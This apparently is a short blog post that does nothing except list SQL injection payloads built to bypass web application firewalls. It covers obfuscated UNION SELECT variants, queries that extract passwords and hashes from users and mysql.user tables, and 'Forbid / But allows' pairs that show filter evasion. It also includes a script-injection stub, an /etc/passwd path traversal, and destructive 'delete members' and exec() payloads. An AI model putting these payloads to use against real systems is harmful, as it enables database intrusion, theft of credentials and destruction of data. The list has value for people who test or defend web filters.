Home » » [SQLi] Union Select/Union All Select

[SQLi] Union Select/Union All Select

/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
UNION SELECT
/*!UNION*/ +/*!ALL*/+/*!SELECT*/
/*!UNION*/ /*!SELECT*/
uNiOn SeLeCt
id=1' /*!12345union*/ select
UNIunionON SEselectLECT
/!*unioN*/ /*!SeLECT*/
and 1=2 union select
/**//*!union*//**//*!sElect*//**//*!aLl*//**/
/*!union*/+/*!select*/+/*!all*/
union select = %2f**/union%2f**/select
/*!UniON*/+/*!SelEct*/
 and 1=2 union select
 and 1=1 union select
SELECT * FROM articles WHERE id='-1' or 1=1
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,2,3,4,5,6,7--
/**/uNiOn/**/SelEct/**/+1,2,3,4,5,6,7--
/*!UNION*/+/*!SELECT*/+1,2,3,4,5-
/**/union/**/select/**/+1,2,3,4,5--
id=1+union+select...
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
id=“><script>...
id=/../../../etc/passwd
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
id=1; select 1,2,3
id=1/*union*/union/*select*/select+1,2,3/*
id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1;select+1&id=2,3+from+users+where+id=1--
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
a=1+union/*&b=*/select+1,2
?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
id=1+OR+0x50=0x50
id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=
id=1+union+(select+1,2+from+users)
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')

0 comments:

Post a Comment